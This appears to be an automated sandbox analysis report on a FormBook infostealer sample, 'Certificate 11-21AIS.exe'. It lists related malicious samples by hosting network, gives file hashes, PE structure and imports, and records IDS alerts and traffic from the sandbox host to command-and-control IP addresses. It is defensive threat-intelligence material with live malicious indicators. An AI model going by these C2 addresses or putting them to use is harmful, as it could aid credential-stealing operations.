www.goldenjade-travel.com | rBALT-10212024.exe | malicious | FormBook | 116.50.37.244
Match | Associated Sample Name / URL | Detection | Threat Name | Context
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | DOC_114542366.vbe | malicious | FormBook | 156.251.17.224
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | https://trackru.top/us | malicious | Unknown | 156.244.41.195
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | RvJVMsNLJI.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | MV KODCO.exe | malicious | FormBook | 154.92.61.37
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 64411-18.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-17.exe | malicious | FormBook | 154.215.72.110
REGISTER-ASIT | Certificate 1045-20-11.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 719A1120-2024.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 11-18720.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | RvJVMsNLJI.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 64411-18.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 11-142024.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | rDocument11-142024.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | RFQ 3100185 MAHAD.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Magnetnaalene.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | 195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 1045-20-11.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 719A1120-2024.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 11-18720.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | RvJVMsNLJI.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 64411-18.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 11-17.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 11-142024.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | rDocument11-142024.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | glued.hta | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | 8UUxoKYpTx.elf | malicious | Mirai | 119.15.228.113
SEDO-ASDE | Certificate 1045-20-11.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 719A1120-2024.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 11-18720.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | RvJVMsNLJI.exe | malicious | FormBook | 91.195.240.94
SEDO-ASDE | Certificate 64411-18.exe | malicious | FormBook |
                                                                            • 91.195.240.94
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                            • 91.195.240.19
                                                                            7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                            • 91.195.240.19
Process: C:\Windows\SysWOW64\netbtugc.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Certificate 11-21AIS.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.991345995587925
Encrypted: true
SSDEEP: 6144:UTw8G07Hs+h2rjJ9Cu8rL5wm4dtKWlJWjzyB3:UT5zs+h2jJ958rAflJiuB3
MD5: 8F26C4E2B133315F10EFE903DF390BB4
SHA1: DD6FC8007F65A4A982E8418FD07D280DA6A0B33F
SHA-256: E4BC88D782078BF850104A42B22855D993A5789EBE8887E5DC3F139FFA1A72DF
SHA-512: B3A65CBE5CA9DE00EBA2EB2C94C0DC68AF87157F3D426F4EAC99871BBD4825FD1EBD059EBEE735B15A5C708A4377387E5C21E58F1EB13C7E10A825AB06DF8506
Malicious: false
Reputation: low
                                                                            Preview:.....D0HQn.Y....t.6D..zG8...GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6.HPJ\[.FQ.N.q.S..i.^.;p: +W:0[g+1$<+Dh3Sg:%$r-^h.y.h=%6!.E\<cHPJRD0H(7N.m*5..(6.z(7.H.kV .J....(6.]...n$W.._$ m*5.0HQ6GHPJ..0H.7FH."..0HQ6GHPJ.D2IZ7LHPZVD0HQ6GHPJ.Q0HQ&GHPjVD0H.6GXPJRF0HW6GHPJRD6HQ6GHPJRd4HQ4GHPJRD2H..GH@JRT0HQ6WHPZRD0HQ6WHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GH~>7<DHQ6.GTJRT0HQ&CHPZRD0HQ6GHPJRD0Hq6G(PJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.119437926545509
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Certificate 11-21AIS.exe
File size: 1'189'888 bytes
MD5: 8b68068b577b39f51dee9c3703ac8999
SHA1: bbfb3d4e750b119d142791bcd2c9cd174ea5f364
SHA256: 14b355ad5cf22181635d1c97b75288d9d3668aabd57558863ef1e795561274c7
SHA512: 8a1f7d517924f128a5cc2f60ab1ee0280844b2adeb3f9ea3fa849f46326e327eed88d244544abd47c319fd345b5f9dbdf06798cef74a0303f7f63e645c0b7f7c
SSDEEP: 24576:Htb20pkaCqT5TBWgNQ7aG4lBiRI7ia0eDD6A:EVg5tQ7aGY3T5
TLSH: 5445CF1373DDC361C3B25273BA26B701AE7B782506A5F96B2FD4093DE820162525EB73
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673F1325 [Thu Nov 21 11:01:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007F2B4587B10Fh
jmp 00007F2B4586E124h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2B4586E2AAh
cmp edi, eax
jc 00007F2B4586E60Eh
bt dword ptr [004C0158h], 01h
jnc 00007F2B4586E2A9h
rep movsb
jmp 00007F2B4586E5BCh
cmp ecx, 00000080h
jc 00007F2B4586E474h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F2B4586E2B0h
bt dword ptr [004BA370h], 01h
jc 00007F2B4586E780h
bt dword ptr [004C0158h], 00000000h
jnc 00007F2B4586E44Dh
test edi, 00000003h
jne 00007F2B4586E45Eh
test esi, 00000003h
jne 00007F2B4586E43Dh
bt edi, 02h
jnc 00007F2B4586E2AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F2B4586E2B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F2B4586E305h
bt esi, 03h
jnc 00007F2B4586E358h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x597f4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11e000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x597f4 | 0x59800 | a9611adfd37702c33cd4a14019583af1 | False | 0.9272515494064246 | data | 7.8906408115013935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11e000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x50af9 | data | | | 1.000335865944101
RT_GROUP_ICON | 0x11d2b4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11d32c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11d340 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11d354 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11d368 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11d444 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                                                                            DLLImport
                                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
KERNEL32.dll: HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-22T07:49:29.052437+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | TCP
2024-11-22T07:50:03.299040+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49752 | 116.50.37.244 | 80 | TCP
2024-11-22T07:51:26.987114+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49805 | 85.159.66.93 | 80 | TCP
2024-11-22T07:51:42.053332+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49974 | 91.195.240.94 | 80 | TCP
2024-11-22T07:52:05.483779+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50019 | 66.29.149.46 | 80 | TCP
2024-11-22T07:52:20.826825+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50023 | 195.110.124.133 | 80 | TCP
2024-11-22T07:52:52.599727+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50027 | 217.196.55.202 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 22, 2024 07:51:42.398338079 CET804997491.195.240.94192.168.2.4
                                                                            Nov 22, 2024 07:51:56.118884087 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:56.238504887 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:56.238635063 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:56.242892981 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:56.362382889 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:57.569866896 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:57.569926023 CET805001066.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:51:57.569968939 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:57.758893967 CET5001080192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:58.774684906 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:58.894187927 CET805001766.29.149.46192.168.2.4
